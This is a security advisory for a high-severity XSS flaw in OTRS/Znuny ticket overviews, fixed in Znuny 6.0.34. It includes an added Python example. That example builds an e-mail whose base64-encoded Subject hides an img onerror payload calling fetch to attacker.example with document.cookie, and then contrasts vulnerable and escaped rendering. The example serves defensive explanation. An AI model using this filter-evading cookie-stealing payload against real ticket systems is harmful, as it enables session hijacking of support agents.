ZSA-2021-06

Date: 2021-04-21

Affected: all versions of OTRS Community Edition; Znuny LTS 6.0.33; OTRS 7

Severity: high

CVE: Pending

This issue was identified by our team (Jens Pfeifer, Johannes Nickel) during a bug analysis.
The bug was reported by Nina Knipprath (HHU).

There is an XSS vulnerability in the ticket overviews which can be used to extract all kinds of information just
by having an e-mail shown in an overview. An attacker only needs to send a prepared e-mail to the system to trigger the attack;
no further user interaction is required. We also created a working PoC to test the impact.
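The following is an added illustration of the bug class, not the advisory's PoC and not Znuny/OTRS code. The advisory does not say which mail header was abused; using the Subject is an assumption made here, and the overview renderer is a toy. The sample e-mail is constructed. It shows the two things a practitioner wants to verify: that a payload can arrive hidden in an RFC 2047 encoded-word, so a blocklist on the raw header bytes never sees it, and that HTML-escaping every untrusted value at output time is what actually closes the hole.

```python
"""Added example (not Znuny/OTRS code): how a crafted e-mail becomes XSS in a
ticket overview, and the output-side escaping that stops it.

Assumptions: the payload sits in the Subject header (the advisory does not
say which field), and the overview row below is a toy renderer, not Znuny's.
"""
import base64
import html
from email import message_from_bytes, policy

# Payload hidden in an RFC 2047 encoded-word, so a naive filter on the raw
# header bytes sees no "<img" at all. Host name is an illustrative placeholder.
_PAYLOAD_SUBJECT = (
    "Invoice <img src=x onerror=\"fetch('https://attacker.example/?c='"
    "+document.cookie)\">"
)
_ENCODED_SUBJECT = (
    "=?utf-8?B?" + base64.b64encode(_PAYLOAD_SUBJECT.encode()).decode() + "?="
)

# Constructed sample message (not a real capture).
RAW_MAIL = (
    "From: Mallory <mallory@attacker.example>\r\n"
    "To: support@example.org\r\n"
    f"Subject: {_ENCODED_SUBJECT}\r\n"
    "MIME-Version: 1.0\r\n"
    "Content-Type: text/plain; charset=utf-8\r\n"
    "\r\n"
    "Hello, please see the attached invoice.\r\n"
).encode()


def parse_mail(raw: bytes) -> dict:
    """Decode the headers the way a ticket system must before displaying them.

    policy.default decodes encoded-words, so the decoded subject now contains
    the literal HTML tag even though the wire form did not.
    """
    msg = message_from_bytes(raw, policy=policy.default)
    return {"from": str(msg["From"]), "subject": str(msg["Subject"])}


def raw_header_filter_sees_payload(raw: bytes) -> bool:
    """Input-side blocklist on the raw header bytes: does it spot the tag?"""
    return b"<img" in raw or b"<script" in raw


def render_row_vulnerable(ticket: dict) -> str:
    """Interpolates decoded header values straight into the overview HTML."""
    return f"<tr><td>{ticket['from']}</td><td>{ticket['subject']}</td></tr>"


def render_row_hardened(ticket: dict) -> str:
    """Same row, but every untrusted value is HTML-escaped at output time."""

    def esc(value: str) -> str:
        # quote=True also escapes ' and ", which matters inside attributes.
        return html.escape(value, quote=True)

    return f"<tr><td>{esc(ticket['from'])}</td><td>{esc(ticket['subject'])}</td></tr>"


if __name__ == "__main__":
    ticket = parse_mail(RAW_MAIL)
    print("raw-byte filter spots payload:", raw_header_filter_sees_payload(RAW_MAIL))
    print("vulnerable:", render_row_vulnerable(ticket))
    print("hardened:  ", render_row_hardened(ticket))
```

The vulnerable row emits the decoded `<img ... onerror=...>` unchanged, so the handler fires for every agent whose overview lists the ticket, which matches the advisory's "no user interaction" description: merely viewing the queue is enough. The raw-byte filter returns False for the same message, which is why sanitising incoming mail is not a substitute for escaping at the template.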

The issue is fixed in the current release 6.0.34. All download links can be found in the release notes.

Please update as soon as possible.
